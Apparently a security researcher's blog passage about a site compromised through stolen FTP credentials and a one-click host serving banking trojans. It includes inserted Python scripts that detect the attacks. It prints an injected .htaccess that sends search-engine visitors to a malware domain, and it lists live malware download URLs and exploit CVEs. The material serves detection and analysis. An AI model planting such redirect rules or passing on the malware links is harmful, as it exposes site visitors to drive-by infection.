RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://ake.kz/in.cgi?7 [R=301,L]
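As an added example that is not part of the original post, here is a small audit script for the two tricks shown above: it walks an .htaccess file and reports every ErrorDocument that points at an absolute URL on a foreign host, and every RewriteRule whose target is a foreign host, together with the number of Referer conditions gating it. The embedded .htaccess is the content quoted above; the site hostname www.example.org is an assumed value for the audited site.

```python
import re
from urllib.parse import urlsplit

# The .htaccess recovered from the compromised server (quoted above).
HTACCESS = """\
ErrorDocument 400 http://ake.kz/in.cgi?8
ErrorDocument 401 http://ake.kz/in.cgi?8
ErrorDocument 403 http://ake.kz/in.cgi?8
ErrorDocument 404 http://ake.kz/in.cgi?8
ErrorDocument 500 http://ake.kz/in.cgi?8
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://ake.kz/in.cgi?7 [R=301,L]
"""

SITE_HOST = "www.example.org"   # assumed hostname of the audited site

ERRORDOC_RE = re.compile(r"^ErrorDocument\s+(\d{3})\s+(\S+)", re.I)
COND_RE = re.compile(r"^RewriteCond\s+(\S+)\s+(\S+)", re.I)
RULE_RE = re.compile(r"^RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)


def external_host(target, site_host):
    """Hostname of an absolute http(s) URL that does not point back at the site itself."""
    if not re.match(r"https?://", target, re.I):
        return None                      # local path or relative URL: not a redirect
    host = urlsplit(target).hostname
    return host if host and host.lower() != site_host.lower() else None


def audit_htaccess(text, site_host):
    """List suspicious off-site redirects as dicts with line, directive, detail, host."""
    findings = []
    pending = []                         # RewriteCond lines waiting for their RewriteRule
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if m := ERRORDOC_RE.match(line):
            if host := external_host(m.group(2), site_host):
                findings.append({"line": lineno, "directive": "ErrorDocument", "host": host,
                                 "detail": f"status {m.group(1)} redirects to {host}"})
        elif m := COND_RE.match(line):
            pending.append((m.group(1), m.group(2)))
        elif m := RULE_RE.match(line):
            if host := external_host(m.group(2), site_host):
                referer = sum(1 for var, _ in pending if "HTTP_REFERER" in var.upper())
                findings.append({"line": lineno, "directive": "RewriteRule", "host": host,
                                 "detail": f"{m.group(1)} -> {host} [{m.group(3) or ''}], "
                                           f"{referer} Referer condition(s)"})
            pending = []                 # conditions only apply to the rule that follows
    return findings


if __name__ == "__main__":
    for f in audit_htaccess(HTACCESS, SITE_HOST):
        print(f"line {f['line']:>3} {f['directive']:<14} {f['detail']}")
```

A catch-all pattern like `^(.*)$` sending traffic off-site, gated only on the Referer header, is the signature of this kind of cloaked redirect; the same audit run over every .htaccess on a shared host is a cheap first sweep after an FTP-credential compromise.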


Nine-Ball followup now with video! Part 1

A reader was gracious enough to share some information with me on the events surrounding the compromise of a website of his. The site was compromised via stolen FTP credentials which has been a technique employed by major Internet threats such as Gumblar and Nine-ball recently. This will be a two part post.

Let's take a look at what happens to the victim webserver after it gets compromised and the malware involved. To make this post more interesting I've decided to deliver my analysis via video! Rather than the standard nerve-grating rock music that people tend to add to videos like this I have opted for my genre of choice, electronic :) . I've included VirusTotal results, domains involved, etc. at the end of the post.

Sit back, relax and enjoy the ride.

Domains / URLs involved:

71speed.info
xbx.tw/in.cgi?6
xbx.tw/in.cgi?3
zyejanag.cn/rf/
fvuligir.cn/s/in.cgi?11
84.244.138.58/ts/in.cgi?chtr&5f9d90
esli.tw/load.php?e=1
esli.tw/2/index.php
esli.tw/show.php?s=18f8bc6e98

Exploits Used:

MDAC -- MS06-014
Adobe Acrobat -- CVE-2008-2992 & CVE-2009-0927
Adobe Flash Player (not sure which one)
Microsoft DirectShow & Office Web Components zero days
Microsoft Snapshot Viewer MS08-041

Virustotal Payload 1 & ThreatExpert Payload 1 -- SilentBanker -- Banking Trojan

Virustotal Payload 2 & ThreatExpert Payload 2 -- Tedroo -- SpamBot

Wepawet PDF exploit


Major Report Coming via HostExploit team

It's been a while since I posted, unfortunately, but it's not due to a lack of attacks to talk about! :) Some time ago I was approached by the HostExploit open source security research group, who asked whether I would help contribute to their efforts. This is the group that put together the research that led to the McColo, Atrivo and EstDomains takedowns. Since I'm always trying to get the word out on attacks and threats, the answer was quite obvious.

So this means my spare time has been mostly spent contributing to the next major report from the HostExploit team. Look for it in the coming weeks, it’s going to be very juicy :)


One Click Hosting Spreads Banking Trojan

While this is not totally new, I only recently came across my first event involving a one-click host serving malware. One-click hosts are providers you have probably heard of, such as RapidShare, Megaupload, YouSendIt and many more; Wikipedia has a list of them. They let you share files over HTTP for free, or for a small fee for premium service.

In the last few weeks (beginning June 17th), a particular OCH (one-click host), hotlinkfiles.com, began serving malware. The host scans uploads with AV, according to a March 25th, 2008 post on their website:

“Today we introduce a new feature of virus scanning on all uploaded files. This is part of our service to protect you from downloading any virus. The feature is seamlessly integrated into Hotlinkfiles.com, our anti-virus software will automatically perform a scan on all uploaded files and will reject any infected file.”

The malware being served must be going undetected by whatever AV hotlinkfiles.com is using. Here is what is being served:

hotlinkfiles.com /files/2607508_gs2zp/eudenoite1.scr
premium.hotlinkfiles.com /files/2619000_idqqh/fotosanexadas.scryh
hotlinkfiles.com /files/2637460_lnqnl/DSC_804.jpg.scr
premium.hotlinkfiles.com /files/2645684_c2awa/fotosanexadas.scr
hotlinkfiles.com /files/2645758_i45ka/DSC_805.jpg.scr

Notice the use of premium.hotlinkfiles.com? This means the attacker has either bought a premium account or is using an account stolen from an unsuspecting victim.
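As an added example that is not part of the original post, the script below applies two checks a proxy or mail gateway can run on downloads like the ones listed above: a filename check that separates a plain executable extension from a decoy double extension (DSC_804.jpg.scr), and a content check for the DOS/PE header that catches a renamed executable regardless of its name. The URLs are the ones from the list above; the PE bytes are a constructed minimal header, not a real binary.

```python
from urllib.parse import urlsplit, unquote

EXEC_EXTENSIONS = {"exe", "scr", "pif", "com", "bat", "cmd", "vbs", "js"}
DECOY_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "doc", "txt"}


def classify_filename(name):
    """'disguised' for decoy.ext.exe-style names, 'executable' for a plain
    executable extension, None if the last extension is not on the list."""
    parts = name.lower().split(".")
    if len(parts) < 2 or parts[-1] not in EXEC_EXTENSIONS:
        return None
    return "disguised" if parts[-2] in DECOY_EXTENSIONS else "executable"


def classify_url(url):
    """Classify the last path segment of a URL (scheme optional, as in the list above)."""
    path = urlsplit(url if "://" in url else "http://" + url).path
    return classify_filename(unquote(path.rsplit("/", 1)[-1]))


def is_pe(data):
    """True if the bytes start with a DOS 'MZ' header whose e_lfanew field
    (offset 0x3C) points at the 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


# URLs from the list above.
OBSERVED_URLS = [
    "hotlinkfiles.com/files/2607508_gs2zp/eudenoite1.scr",
    "premium.hotlinkfiles.com/files/2619000_idqqh/fotosanexadas.scryh",
    "hotlinkfiles.com/files/2637460_lnqnl/DSC_804.jpg.scr",
    "premium.hotlinkfiles.com/files/2645684_c2awa/fotosanexadas.scr",
    "hotlinkfiles.com/files/2645758_i45ka/DSC_805.jpg.scr",
]

# Constructed stand-in for a downloaded file: a minimal MZ/PE header only.
FAKE_PE = bytearray(0x44)
FAKE_PE[0:2] = b"MZ"
FAKE_PE[0x3C:0x40] = (0x40).to_bytes(4, "little")
FAKE_PE[0x40:0x44] = b"PE\0\0"

if __name__ == "__main__":
    for url in OBSERVED_URLS:
        print(f"{classify_url(url) or 'no verdict':<12} {url}")
    print("constructed header is PE:", is_pe(bytes(FAKE_PE)))
```

The second URL is the reason for the content check: fotosanexadas.scryh has no recognised extension, so a filename rule alone passes it, while an MZ/PE check on the downloaded bytes does not care what the file is called.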

Detection for the first stage download is pretty good at 30/41, most vendors detect it as Banload which is also classed as a banking trojan. [Virustotal1] [Virustotal2]

Downloader.Banload.AMIX
Win-Trojan/Banload.71680.O
Win32/TrojanDownloader.Banload.BDA

PWS-Banker!ee
Mal_Banker

The file downloads several more payloads which are all executables [Threatexpert] however the detection rate is terrible on them with most being detected by 0/41 vendors. [Virustotal]

hxxp://gay24x01.hpg.ig.com.br/ree1.html
hxxp://gay24x01.hpg.ig.com.br/ree2.html
hxxp://gay24x02.hpg.ig.com.br/nl2.html
hxxp://gay24x02.hpg.ig.com.br/nl3.html
hxxp://gay24x02.hpg.ig.com.br/nl4.html
hxxp://gay24x02.hpg.ig.com.br/nl5.html
hxxp://gay24x02.hpg.ig.com.br/nl6.html
hxxp://gay24x02.hpg.ig.com.br/nl7.html

So what does this mean? Since sites like hotlinkfiles.com are perfectly legitimate, category-based web content filtering will not block them. The second-stage URLs can still be blocked, but they can change at any time, and analysis of the first stage must be performed before they can even be found. In a corporate environment, consider blocking these file transfer services if they are not needed.

As for where this attack came from, it was delivered via spam with a subject line of "fotos [date]", written in Portuguese. The text reads "These photos are very funny".

[screenshot: Portuguese spam message carrying the malware link]
